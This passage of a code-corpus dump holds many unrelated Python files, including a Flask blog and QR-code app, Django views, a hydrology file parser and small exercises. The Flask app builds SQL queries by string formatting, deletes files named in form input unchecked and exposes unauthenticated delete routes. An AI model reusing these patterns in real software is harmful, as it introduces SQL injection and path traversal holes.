~/abu/data\"\"\"\ng_project_data_dir = path.join(g_project_root, 'data')\n\"\"\"abu日志文件夹 ~/abu/log\"\"\"\ng_project_log_dir = path.join(g_project_root, 'log')\n\"\"\"abu数据库文件夹 ~/abu/db\"\"\"\ng_project_db_dir = path.join(g_project_root, 'db')\n\"\"\"abu缓存文件夹 ~/abu/cache\"\"\"\ng_project_cache_dir = path.join(g_project_data_dir, 'cache')\n\"\"\"abu项目数据主文件目录,即项目中的RomDataBu位置\"\"\"\ng_project_rom_data_dir = path.join(path.dirname(path.abspath(path.realpath(__file__))), '../RomDataBu')\n\n\"\"\"abu日志文件 ~/abu/log/info.log\"\"\"\ng_project_log_info = path.join(g_project_log_dir, 'info.log')\n\n\"\"\"hdf5做为金融时间序列存储的路径\"\"\"\ng_project_kl_df_data = path.join(g_project_data_dir, 'df_kl.h5')\n\n_p_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.path.pardir))\n\n\n# ******************** 日志 start ****************\n# TODO 将log抽出来从env中\ndef init_logging():\n \"\"\"\n logging相关初始化工作,配置log级别,默认写入路径,输出格式\n \"\"\"\n if not os.path.exists(g_project_log_dir):\n # 创建log文件夹\n os.makedirs(g_project_log_dir)\n\n # 输出格式规范\n # file_handler = logging.FileHandler(g_project_log_info, 'a', 'utf-8')\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename=g_project_log_info,\n filemode='a'\n # handlers=[file_handler]\n )\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # 屏幕打印只显示message\n formatter = logging.Formatter('%(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n\n\ninit_logging()\n\n# ******************** 日志 end ****************\n\ng_plt_figsize = (14, 7)\n\n\ndef init_plot_set():\n \"\"\"全局plot设置\"\"\"\n import seaborn as sns\n sns.set_context('notebook', rc={'figure.figsize': g_plt_figsize})\n sns.set_style(\"darkgrid\")\n\n import matplotlib\n # conda 5.0后需要添加单独matplotlib的figure设置否则pandas的plot size不生效\n matplotlib.rcParams['figure.figsize'] = g_plt_figsize\n\n\ninit_plot_set()\n","sub_path":"common/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"343748775","text":"from peewee import *\nfrom os import path\nROOT = path.dirname(path.realpath(__file__))\ndb = SqliteDatabase(path.join(ROOT, \"activities.db\"))\n\nclass Activity(Model):\n name = CharField()\n desc = CharField()\n location = CharField()\n class Meta:\n database = db\nActivity.create_table(fail_silently=True)\n\nActivity.create(name=\"Water Day\", desc=\"Celebrating Water Diving\",location=\"Nanyuki\")\nActivity.create(name=\"Running\", desc=\"Eldoret Marathon\",location=\"Eldoret\")\nActivity.create(name=\"Running\", desc=\"Eldoret Marathon\",location=\"Eldoret\")","sub_path":"King_System/activities.py","file_name":"activities.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"166704366","text":"#! /usr/bin/python\n# https://adventofcode.com/2018/day/2\n\nfrom collections import defaultdict\n\n# read input\ninfile = open(\"input\",\"r\")\ninlist = []\nwhile True:\n # read line and strip newline characters\n instr = infile.readline().rstrip(\"\\r\\n\")\n\n if instr == '': # eof\n break\n\n inlist.append(instr)\ninfile.close()\n\ntwos = 0\nthrees = 0\n\nfor ID in inlist:\n isTwos = False\n isThrees = False\n\n # default dict to store letter frequencies\n freq = defaultdict(int)\n for c in ID:\n # increment freq of char if it exists\n freq[c] += 1\n for c in freq:\n if freq[c] == 2 and not isTwos:\n twos += 1\n isTwos = True\n if freq[c] == 3 and not isThrees:\n threes += 1\n isThrees = True\n\nchecksum = twos * threes\n\n# write solution\nofile= open(\"output1\",\"w\")\nofile.write(str(checksum))\nofile.close()\n","sub_path":"02/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609354396","text":"from django.shortcuts import render\nfrom mealmanageapp.models import Event,Store\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\n\n# Create your views here.\n\ndef detail(request):\n context = {}\n event_all = Event.objects.order_by('-date')\n paginator = Paginator(event_all,5)\n page = request.GET.get('page')\n try:\n event_list = paginator.page(page)\n except PageNotAnInteger:\n event_list = paginator.page(1)\n except EmptyPage:\n event_list = paginator.page(paginator.num_pages)\n\n context['event_list'] = event_list\n return render(request,'detail.html',context)\n\n\ndef exhaustive(request,page_num):\n context = {}\n event_list = Event.objects.filter(id=page_num)\n context['event_list'] = event_list\n for i in event_list:\n if i.staus == 'producing':\n return render(request,'producting.html',context)\n if i.staus == 'selling':\n return render(request,'selling.html',context)\n if i.staus == 'transporting':\n return render(request,'transporting.html',context)\n else:\n pass\n\ndef count(request):\n context = {}\n producing_list = Event.objects.filter(staus='producing')\n selling_list = Event.objects.filter(staus='selling')\n transporting_list = Event.objects.filter(staus='transporting')\n store_list = Store.objects.all()\n\n producing_cost = 0\n producing_amount = 0\n producing_yuanwei = 0\n producing_yexiang = 0\n producing_lemon = 0\n producing_coco = 0\n producing_lanmei = 0\n for i in producing_list:\n producing_cost = producing_cost + i.money\n producing_amount = producing_amount + i.numbers_in_real\n producing_yuanwei = producing_yuanwei + i.yuanwei\n producing_yexiang = producing_yexiang + i.yexiang\n producing_lanmei = producing_lanmei + i.lanmei\n producing_lemon = producing_lemon + i.lemon\n producing_coco = producing_coco + i.coco\n\n selling_get = 0\n selling_amount = 0\n selling_yuanwei = 0\n selling_yexiang = 0\n selling_lemon = 0\n selling_coco = 0\n selling_lanmei = 0\n for i in selling_list:\n selling_get = selling_get + i.money\n selling_amount = selling_amount + i.numbers_in_real\n selling_yuanwei = selling_yuanwei + i.yuanwei\n selling_yexiang = selling_yexiang + i.yexiang\n selling_lanmei = selling_lanmei + i.lanmei\n selling_lemon = selling_lemon + i.lemon\n selling_coco = selling_coco + i.coco\n\n transporting_cost = 0\n transporting_amount = 0\n transporting_yuanwei = 0\n transporting_yexiang = 0\n transporting_lemon = 0\n transporting_coco = 0\n transporting_lanmei = 0\n for i in transporting_list:\n transporting_cost = transporting_cost + i.money\n transporting_amount = transporting_amount + i.numbers_in_real\n transporting_yuanwei = transporting_yuanwei + i.yuanwei\n transporting_yexiang = transporting_yexiang + i.yexiang\n transporting_lanmei = transporting_lanmei + i.lanmei\n transporting_lemon = transporting_lemon + i.lemon\n transporting_coco = transporting_coco + i.coco\n\n context['cost'] = producing_cost + transporting_cost\n context['selling_get'] = selling_get\n context['producing_amount'] = producing_amount\n context['selling_amount'] = selling_amount\n\n for i in store_list:\n context['level_one'] = i.level_one\n context['level_two'] = i.level_two\n context['yuanwei'] = i.yuanwei\n context['yexiang'] = i.yexiang\n context['coco'] = i.coco\n context['lemon'] = i.lemon\n context['lanmei'] = i.lanmei\n\n return render(request,'count.html',context)","sub_path":"mealmanageapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140720464","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport openpyxl as opxl\n\n# path = input(\"Enter path to .tot files: \")\n\npath = r\"J:\\500am - M12 Overarching Hydrology\\Calcs\\RAFTS\\RAFTS Files\\Kemps Creek\"\n\n# Select only .tot files in the list\ndir_list = [n for n in os.listdir(path) if \".tot\" in n]\nos.chdir(path)\n\n# Sort the list first storm burst, then duration, then AEP.\ndir_list.sort(key=lambda x: int(x[x.find(\"TP\")+2:x.find(\".\")]))\ndir_list.sort(key=lambda x: int(x[x.find(\"_\")+1:x.find(\"min\")]))\ndir_list.sort(key=lambda x: float(x[0:x.find(\"%\")].replace(\"pt\",\".\")))\n\n# Create a dictionary to store all the data\nall_data = {}\n\n# Loop through list and identify the AEP, duration and storm burst number\nfor file in dir_list:\n\taep = file.split(\"_\")[0]\n\tdur = file.split(\"_\")[1]\n\tburst = file.split(\"_\")[2][:-4]\n\n\t''' Open the file and read only the lines storing flow data and call it 'data'\n\tAssumes only one storm per file (i.e. 1%, 6hr, Storm burst 1) \n\t'''\n\twith open(file, 'r') as f:\n\t\t# read all of the data in the text file bar the first line.\n\t\tdata = f.readlines()[1:]\n\t\t''' Loop through 'data' and turn each line that is 101 characters in length\n\t\tinto a list of floats. Every row that contains flow data is 101 characters\n\t\tlong. Once the data is put into one long series, the length of all the data\n\t\twill be split into divisions depending on how many catchments there are. This\n\t\tsaves having to tell python where each new block starts.\n\t\tAlso initialize a list called catchments which will store all of the catchment\n\t\tnames within the .tot file.\n\t\t'''\n\t\tseries = np.array([])\n\t\tcatchments = []\n\t\tfor line in data:\n\t\t\tif len(line) == 101:\n\t\t\t\tline = [float(n) for n in line.split()]\n\t\t\t\t# Flatten the list of lists into one long list.\n\t\t\t\tseries = np.append(series, line)\n\t\t\telse:\n\t\t\t\t# Append the name of the catchment to the catchments list\n\t\t\t\tcatchments.append(line.split()[-1])\n\n\t\t\"\"\" The length of each block of data for each subcatchment should be \n\t\tthe entire length of the series divided by the number of catchments in the\n\t\tfile.\n\t\t\"\"\"\n\t\tsubseries_length = len(series) / len(catchments)\n\n\t\t''' Try to write to the dictionary 'all_data' under the appropriate\n\t\t\tkey. If a KeyError occurs then create the key.\n\t\t'''\n\t\tfor i, catch in enumerate(catchments):\n\t\t\tsubseries = series[int(i*subseries_length) : int((i+1)*subseries_length)]\n\t\t\ttry:\n\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\t\t\texcept KeyError:\n\t\t\t\ttry:\n\t\t\t\t\tall_data[catch][aep][dur] = {}\n\t\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\t\t\t\texcept KeyError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tall_data[catch][aep] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tall_data[catch] = {}\n\t\t\t\t\t\tall_data[catch][aep] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst] = {}\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"hydrograph\"] = subseries\n\t\t\t\t\t\tall_data[catch][aep][dur][burst][\"max\"] = np.amax(subseries)\n\n# catch = '1.16D'\n# aep = '1%AEP'\n# burst = 'TP1'\n# for duration in all_data[catch][aep]:\n# \tprint(duration)\n# \tplt.figure()\n# \tplt.plot(all_data[catch][aep][duration][burst][\"hydrograph\"])\n# \tplt.xlabel(\"Time (mins)\")\n# \tplt.ylabel(\"Flow (m3/s)\")\n# \tplt.title(\"Catchment {} - {} {} {}\".format(catch, aep, duration, burst))\n# \tplt.show()\n\nfor catch in all_data:\n\tworkbook = opxl.Workbook()\n\tfor aep in all_data[catch]:\n\t\tworkbook.create_sheet(aep)\n\t\tsheet = workbook[aep]\n\t\tfor i, dur in enumerate(all_data[catch][aep]):\n\t\t\tfor j, burst in enumerate(all_data[catch][aep][dur], start=1):\n\t\t\t\tfor k, n in enumerate(all_data[catch][aep][dur][burst][\"hydrograph\"], start=2):\n\t\t\t\t\tsheet[\"\".join([opxl.utils.cell.get_column_letter(i*10+j), str(k)])] = n\n\n\n\n\n# for catch in all_data:\n# \tworkbook = opxl.Workbook()\n# \tfor aep in all_data[catch]:\n# \t\tworkbook.create_sheet(aep)\n# \t\tsheet = workbook[aep]\n# \t\tfor i, dur in enumerate(all_data[catch][aep]):\n# \t\t\tfor j, burst in enumerate(all_data[catch][aep][dur]):\n# \t\t\t\tfor n in all_data[catch][aep][dur][burst]['hydrograph']:\n# sheet[\"\".join([opxl.utils.cell.get_column_letter(i*10+1), str(1)])] = 1\n\t\t\t\t\n\n# \tworkbook.save(\"Catchment {} Workbook.xlsx\".format(catch))\n\n\n\n","sub_path":"RAFTS/analyse_storm_injector_tot_output_002.py","file_name":"analyse_storm_injector_tot_output_002.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"629721967","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author:GT\n@file:classops.py\n@time:1/3/201811:38 AM\n\"\"\"\nclass Student(object):\n __slots__ = ('name','age','score')\n def get_score(self):\n return self.score\n def set_score(self,value):\n if not isinstance(value, int):\n raise ValueError('score must be int')\n if value < 0 and value > 100:\n raise ValueError('socre shoule be between 1 - 100')\n self._score = value","sub_path":"Classops/classops.py","file_name":"classops.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"138554069","text":"import os\nimport yaml\nimport glob\nfrom flask import Flask, render_template, flash, session, request, redirect\nfrom flask_bootstrap import Bootstrap\nfrom flask_mysqldb import MySQL\nfrom flask_ckeditor import CKEditor\nfrom flask_table import Table, Col\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom qrcode_project import create_qr, read_qr\nfrom get_image import get_image\n\napp = Flask(__name__)\nBootstrap(app)\nCKEditor(app)\n\n#configure db\ndb = yaml.load(open('db.yaml'))\napp.config['MYSQL_HOST'] = db['mysql_host']\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\nmysql = MySQL(app)\n\napp.config['SECRET_KEY'] = os.urandom(24)\n\nQRCODE_FOLDER = os.path.join('static', 'qrcodes')\napp.config['UPLOAD_FOLDER'] = QRCODE_FOLDER\n\n@app.route('/')\ndef index():\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * from blog\")\n if resultValue > 0:\n blogs = cur.fetchall()\n cur.close()\n return render_template('index.html', blogs=blogs)\n cur.close()\n return render_template('index.html', blogs=None)\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/projects')\ndef projects():\n return render_template('projects.html')\n\n@app.route('/qr-code-project', methods=['GET', 'POST'])\ndef qr_code_project():\n if request.method == 'POST':\n requestDelete = request.form\n os.remove(os.path.join('static/qrcodes/',requestDelete['delete']))\n image_files = get_image(QRCODE_FOLDER)\n print(image_files)\n return render_template('qr-code-project.html', qr_images=image_files)\n\n@app.route('/generate-qr', methods=['GET','POST'])\ndef generate_qr():\n if request.method == 'POST':\n userDetails = request.form\n qrcode_image = create_qr(str(userDetails['order_number']))\n address = \"static/qrcodes/\" + str(userDetails['order_number']) + \".png\"\n qrcode_image.save(address)\n qr_image = \"qrcodes/\" + str(userDetails['order_number']) + \".png\"\n flash(\"Successfully generated QRCode!\", 'success')\n return render_template('generate-qr.html', qrcode_image=qr_image)\n return render_template('generate-qr.html', qrcode_image=None)\n\n@app.route('/read-qr', methods=['GET','POST'])\ndef read_qr():\n if request.method == 'POST':\n flash(\"Successfully generated QRCode!\", 'success')\n return render_template('read-qr.html')\n\n@app.route('/view-qr/')\ndef view_qr(id):\n cur = mysql.connection.cursor()\n results = cur.execute(\"SELECT orders.itemNumber, items.itemName, items.itemDescription, orders.quantity FROM madnoyz.orders as orders INNER JOIN madnoyz.items as items ON items.itemId = orders.itemNumber WHERE orders.poNumber = %s\", ([id]))\n if results > 0:\n results = cur.fetchall()\n items = ItemTable(results)\n return render_template('view-qr.html', Items=results)\n else:\n return render_template('view-qr.html', Items=None)\n\n@app.route('/db')\ndef qr_database():\n return render_template('qr-database.html')\n\n@app.route('/blogs//')\ndef blogs(id):\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * FROM blog WHERE blog_id={}\".format(id))\n if resultValue > 0:\n blog = cur.fetchone()\n return render_template('blogs.html', blog=blog)\n return 'Blog not found'\n\n@app.route('/register', methods=['GET','POST'])\ndef register():\n if request.method == 'POST':\n userDetails = request.form\n if(userDetails['password']) != userDetails['confirm_password']:\n flash(\"Passwords do not match! Try again.\", 'danger')\n return render_template('register.html')\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO user(first_name, last_name, username, email, password)\"\n \"VALUES(%s,%s,%s,%s,%s)\", (userDetails['first_name'], userDetails['last_name'],\n userDetails['username'], userDetails['email'], generate_password_hash(userDetails['password'])))\n mysql.connection.commit()\n cur.close()\n flash('Registration successful! Please login.', 'success')\n return redirect('/login')\n return render_template('register.html')\n\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if request.method == 'POST':\n userDetails = request.form\n username = userDetails['username']\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * FROM user WHERE username = %s\", ([username]))\n if resultValue > 0:\n user = cur.fetchone()\n if check_password_hash(user['password'], userDetails['password']):\n session['login'] = True\n session['firstName'] = user['first_name']\n session['lastName'] = user['last_name']\n flash(\"Welcome \" + session['firstName'] + '! You have successfully logged in.', 'success')\n else:\n cur.close()\n flash(\"Password does not match.\", 'danger')\n return render_template('login.html')\n else:\n cur.close()\n flash('User not found', 'danger')\n return render_template('login.html')\n cur.close()\n return redirect('/')\n return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n flash(\"You have been logged out.\", 'info')\n return redirect('/')\n\n@app.route('/my-blogs')\ndef my_blogs():\n if session.get('firstName') :\n author = session['firstName'] + ' ' + session['lastName']\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * FROM blog WHERE author = %s\", [author])\n if resultValue > 0:\n blogs = cur.fetchall()\n cur.close()\n return render_template('my-blogs.html', blogs=blogs)\n else:\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * from blog\")\n if resultValue > 0:\n blogs = cur.fetchall()\n cur.close()\n return render_template('my-blogs.html', blogs=blogs)\n cur.close()\n return render_template('my-blogs.html', blogs=None)\n\n\n@app.route('/write-blog/', methods=['GET','POST'])\ndef write_blog():\n if request.method == 'POST':\n blogpost = request.form\n title = blogpost['title']\n body = blogpost['body']\n author = session['firstName'] + ' ' + session['lastName']\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO blog(title, body, author) VALUES(%s, %s, %s)\", (title, body, author))\n mysql.connection.commit()\n cur.close()\n flash(\"Successfully posted new blog\", 'success')\n return redirect('/')\n return render_template('write-blog.html')\n\n@app.route('/edit-blog//', methods=['GET', 'POST'])\ndef edit_blog(id):\n if request.method == 'POST':\n cur = mysql.connection.cursor()\n title = request.form['title']\n body = request.form['body']\n cur.execute(\"UPDATE blog SET title = %s, body = %s WHERE blog_id = %s\", (title, body, id))\n mysql.connection.commit()\n cur.close()\n flash('Blog updated successfully.', 'success')\n return redirect('/blogs/{}'.format(id))\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * FROM blog WHERE blog_id = {}\".format(id))\n if resultValue > 0:\n blog = cur.fetchone()\n blog_form = {}\n blog_form['title'] = blog['title']\n blog_form['body'] = blog['body']\n return render_template('edit-blog.html', blog_form=blog_form)\n\n@app.route('/delete-blog//')\ndef delete_blog(id):\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM blog WHERE blog_id = {}\".format(id))\n mysql.connection.commit()\n flash(\"Your blog has been deleted\", 'success')\n return redirect('/')\n\nif __name__ == '__main__':\n app.run()\n\n","sub_path":"myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":8035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368059224","text":"# -*- coding: utf-8 -*-\n#author:Haochun Wang\nimport xlrd, xlwt, os, time\nclass Tablemaker:\n def __init__(self):\n self.font0 = xlwt.Font()\n self.font0.colour_index = 2 # red\n self.font1 = xlwt.Font()\n self.font1.colour_index = 3 # green\n self.style0 = xlwt.XFStyle()\n self.style1 = xlwt.XFStyle()\n self.style0.font = self.font0\n self.style1.font = self.font1\n self.write_table()\n\n def write_table(self):\n with open('res_tmp.txt') as d: # open the temporary text file\n p = d.readlines()\n products = sorted(p) # sort the lines by the alphabet order of product names\n timestamp = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))\n path_exist = 'price_folder/price.xls'\n save_path = 'price_folder/price' + timestamp + '.xls'\n path_folder = '/Users/hcwang/Desktop/spider-py/aus_spider/price_folder/'\n\n try:\n lists = os.listdir(path_folder) # 列出目录的下所有文件和文件夹保存到lists\n lists.sort(key=lambda fn: os.path.getmtime(path_folder + \"/\" + fn)) # 按时间排序\n path_exist = os.path.join(path_folder, lists[-1]) # 获取最新的文件保存到file_new\n\n oldsheet = xlrd.open_workbook(path_exist).sheet_by_index(0)\n numrow = oldsheet.nrows\n olddic = {}\n for i in range(1, numrow):\n olddic[oldsheet.row_values(i)[0].replace(' ', '-').replace('\\'', '39')] = oldsheet.row_values(i)[1]\n\n newbook = xlwt.Workbook(encoding='utf-8', style_compression=0)\n newsheet = newbook.add_sheet('sheet1', cell_overwrite_ok=True)\n new_sheet_sorted = newbook.add_sheet('sheet2', cell_overwrite_ok=True)\n\n currentrow = 1\n newsheet.write(0, 0, 'product_name_en')\n newsheet.write(0, 1, 'price_aud')\n newsheet.write(0, 2, 'price_yuan')\n newsheet.write(0, 3, 'discount') \n\n for i in xrange(len(products) - 1):\n rowsplits = products[i].split(', ')\n #print rowsplits[1][1:]\n #print type(rowsplits[1][1:])\n #print len(rowsplits[1][1:])\n newsheet.write(currentrow, 0, rowsplits[0].replace('-', ' ').replace('39', '\\''))\n if olddic.has_key(rowsplits[0]) and float(olddic[rowsplits[0]]) > float(rowsplits[1][1:]):\n newsheet.write(currentrow, 1, float(rowsplits[1][1:]), self.style0)\n newsheet.write(currentrow, 2, float(rowsplits[2]), self.style0)\n newsheet.write(currentrow, 3, float(rowsplits[3]), self.style0)\n elif olddic.has_key(rowsplits[0]) and float(olddic[rowsplits[0]]) < float(rowsplits[1][1:]):\n newsheet.write(currentrow, 1, float(rowsplits[1][1:]), self.style1)\n newsheet.write(currentrow, 2, float(rowsplits[2]), self.style1)\n newsheet.write(currentrow, 3, float(rowsplits[3]), self.style1)\n else:\n newsheet.write(currentrow, 1, float(rowsplits[1][1:]))\n newsheet.write(currentrow, 2, float(rowsplits[2]))\n newsheet.write(currentrow, 3, float(rowsplits[3]))\n currentrow += 1\n newbook.save(save_path)\n except:\n newbook = xlwt.Workbook(encoding='utf-8',style_compression=0)\n newsheet = newbook.add_sheet('sheet1', cell_overwrite_ok=True)\n\n currentrow = 1\n newsheet.write(0, 0, 'product_name_en')\n newsheet.write(0, 1, 'price_aud')\n newsheet.write(0, 2, 'price_yuan')\n newsheet.write(0, 3, 'discount')\n for i in xrange(len(products)-1):\n rowsplits = products[i].split(', ')\n newsheet.write(currentrow, 0, rowsplits[0].replace('-', ' ').replace('39', '\\''))\n newsheet.write(currentrow, 1, float(rowsplits[1][1:]))\n newsheet.write(currentrow, 2, float(rowsplits[2]))\n newsheet.write(currentrow, 3, float(rowsplits[3]))\n currentrow += 1\n newbook.save(save_path)\n\n\n return\nTablemaker()","sub_path":"rate.py","file_name":"rate.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"581239937","text":"import os\n\nfrom flask import Flask, request, send_file\n\nfrom . import utils\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n CACHE=os.path.join(os.getcwd(), 'cache')\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n try:\n os.makedirs(app.config['CACHE'])\n except OSError:\n pass\n\n # a simple page that says hello\n @app.route('/hello')\n def hello():\n return 'Hello, World!'\n\n\n @app.route('/upload', methods=['POST'])\n def upload_file():\n if request.method == 'POST':\n # check if the post request has the file part\n print(request.files)\n if 'file' not in request.files:\n return 'No file part'\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n return 'No selected file'\n if file and utils.allowed_file(file.filename):\n filename = utils.secure_filename(file.filename)\n filename = file.filename\n file.save(os.path.join(app.config['CACHE'], filename))\n return filename + ' is uploaded'\n\n\n @app.route('/heatmap/')\n def get_image(pid):\n #For windows you need to use drive name [ex: F:/Example.pdf]\n path = os.path.join(os.getcwd(),'cache/{}'.format(pid))\n return send_file(path, as_attachment=True)\n\n\n\n return app\n\n","sub_path":"flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"607650456","text":"import unittest\nimport asyncio\nfrom crawler import pools\nfrom crawler.by_async import fetcher,parser,saver\nclass Test(unittest.TestCase):\n def setUp(self):\n '''begin to running'''\n print('setUp')\n def tearDown(self):\n '''end to running'''\n print('tearDown')\n def test_urlpool(self):\n url = pools.UrlPool()\n urlset=set()\n for i in range(1000):\n x=hash(\"asxvzpcmzurl\")\n url.put(x)\n urlset.add(x)\n self.assertEqual(len(urlset),url.qsize(),msg=\\\n \"UrlPool or BloomFilter has error\") \n def test_AsyncFetcher(self):\n try:\n url=\"http://www.baidu.com\"\n test_fetcher = fetcher.Fetcher()\n tasks = [\n asyncio.ensure_future(test_fetcher.fetch(url)),\n ]\n loop = asyncio.get_event_loop()\n html = loop.run_until_complete(asyncio.wait(tasks))\n test_fetcher.close_session()\n try:\n loop.run_until_complete(asyncio.wait(tasks))\n except KeyboardInterrupt as e:\n for task in asyncio.Task.all_tasks():\n task.cancel()\n loop.run_forever() # restart loop\n finally:\n loop.close()\n except Exception as e:\n self.assertFalse(expr=e)\n def test_AsyncParser(self):\n \"\"\"\n there are 8 urls in the thml\n \"\"\"\n html = '''登录
糯米新闻hao\\\n 123地图视频贴吧`.\n\n If you configure a login url with a query parameter, Tornado will\n assume you know what you're doing and use it as-is. If not, it\n will add a `next` parameter so the login page knows where to send\n you once you're logged in.\n \"\"\"\n @functools.wraps(method)\n @coroutine\n def wrapper(self, *args, **kwargs):\n input_token = self.get_argument('access_token', None)\n try:\n assert input_token\n token = yield AccessTokenRepository.read_one(access_token=input_token)\n if token.is_expired:\n raise InvalidArguments\n except NoResultFound:\n self.set_status(httplib.UNAUTHORIZED)\n self.write({\n 'error': 'Invalid Access Token',\n 'payload': {\n 'access_token': input_token\n }\n })\n raise Return()\n except InvalidArguments:\n self.set_status(httplib.BAD_REQUEST)\n self.write({\n 'error': 'Access Token Expired',\n 'payload': {\n 'access_token': input_token,\n }\n })\n except AssertionError:\n self.set_status(httplib.BAD_REQUEST)\n self.write({\n 'error': 'Missing Access Token',\n })\n raise Return()\n raise Return(method(self, *args, **kwargs))\n return wrapper\n","sub_path":"ParkingFinder/handlers/base/validate_token.py","file_name":"validate_token.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570197580","text":"import queue\n\n\nclass topological():\n def __init__(self):\n self.__read_data()\n self.status = [-1 for _ in range(self.V)]\n self.indeg = [0 for _ in range(self.V)]\n self.__assign_indeg()\n self.__assign_adj_list()\n self.out = []\n\n def __read_data(self):\n self.V, self.E = list(map(int, input().split()))\n self.Nodes = [list(map(int, input().split())) for _ in range(self.E)]\n\n def __assign_indeg(self):\n for node in self.Nodes:\n self.indeg[node[1]] += 1\n\n def __assign_adj_list(self):\n self.adj_list = [[] for _ in range(self.V)]\n for node in self.Nodes:\n self.adj_list[node[0]].append(node[1])\n\n def __bfs(self, s):\n q = queue.Queue()\n q.put(s)\n self.status[s] = 1\n while not q.empty():\n u = q.get()\n self.out.append(u)\n for v in self.adj_list[u]:\n self.indeg[v] -= 1\n if self.indeg[v] == 0 and self.status[v] != 1:\n self.status[v] = 1\n q.put(v)\n\n def __sort(self):\n for i in range(self.V):\n if self.indeg[i] == 0 and self.status[i] != 1:\n self.__bfs(i)\n\n def exec(self):\n self.__sort()\n\n def show(self):\n for i in self.out:\n print(i)\n\n\ndef main():\n obj = topological()\n obj.exec()\n obj.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"kyopro/aizu/GRL/GRL_4_B_TopologicalSort_bfs.py","file_name":"GRL_4_B_TopologicalSort_bfs.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"32836524","text":"from __future__ import print_function\r\nimport httplib2\r\nimport os\r\n\r\nfrom apiclient import discovery\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\nfrom oauth2client.file import Storage\r\n\r\nimport datetime\r\n\r\nfrom bs4 import BeautifulSoup, SoupStrainer\r\nimport urllib2\r\nimport re\r\nimport 